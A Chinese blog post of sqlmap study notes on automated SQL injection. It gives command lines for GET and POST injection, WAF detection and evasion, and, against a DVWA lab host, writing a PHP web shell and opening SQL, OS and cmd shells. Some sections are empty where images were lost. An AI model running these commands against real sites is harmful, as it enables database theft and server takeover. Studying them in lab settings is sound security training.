安全学习笔记day9-sql注入之自动化注入

本文详细介绍SQLMap工具的基础使用方法及高级技巧,包括GET与POST注入、混淆注入、代理注入等,并提供提权操作实例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0、内容有三(sqlmap,Havij-胡萝卜,Pangolin-穿山甲)

一、sqlmap提纲



二、学习顺序:



三、基本信息


1、GET方式注入

A、语法


基本:sqlmap -u url 后面可以跟 -f -p(当参数只有一个的时候没必要使用-p但是如果是多个参数时候例如username=aaa&pwd=aaaa时候 可以指定 -p username或者 -p pwd 或者不指定 也可) --users(用户信息) --banner(各个版本信息) --dbs(数据库信息) --all(全部信息罪毒辣) 

2、POST方法注入


基本语法:

sqlmap -r 保存的post头信息文件 

例如 : sqlmap -r post.txt

另外一种方法,带参数

A、带cookie的 sqlmap -u url --cookie="xxxx"

B、带data的    sqlmap -u url --data="username=admin&password=123456"


3、混淆注入

知识结构


语法:

检测对方waf : sqlmap -u url --identify-waf

绕过对方waf: 

sqlmap -u url --skip-waf --random-agent 通过使用随机agent

sqlmap -u url --skip-waf --random-agent --mobile 通过手机请求 使用随机agent

sqlmap -u url --skip-waf --random-agent --mobile --level 3 risk=2 提高安全/危险等级 通过手机请求 使用随机agent

sqlmap -u url --skip-waf --random-agent --mobile --smart  smart智能模式

sqlmap -u url --skip-waf --random-agent --mobile --smart  --offline  减少根对方的交互

4、代理注入:


5、高级注入:


上图语法使用 或者

sqlmap -u url --level=3 --risk=3


6、数据获取




7、提权操作


语句范例:

sqlmap -u http://192.168.56.103/dvwa/vulnerabilities/sqli/?id=23&Submit=Submit --file-write="../shell.php" --file-dest="tmp/shell.php"


sqlshell:

sqlmap -u http://192.168.56.103/dvwa/vulnerabilities/sqli/?id=23&Submit=Submit --sql-shell  数据库shell

sqlmap -u http://192.168.56.103/dvwa/vulnerabilities/sqli/?id=23&Submit=Submit --os-shell  操作系统shell

sqlmap -u http://192.168.56.103/dvwa/vulnerabilities/sqli/?id=23&Submit=Submit --cmd-shell  cmdshell




评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值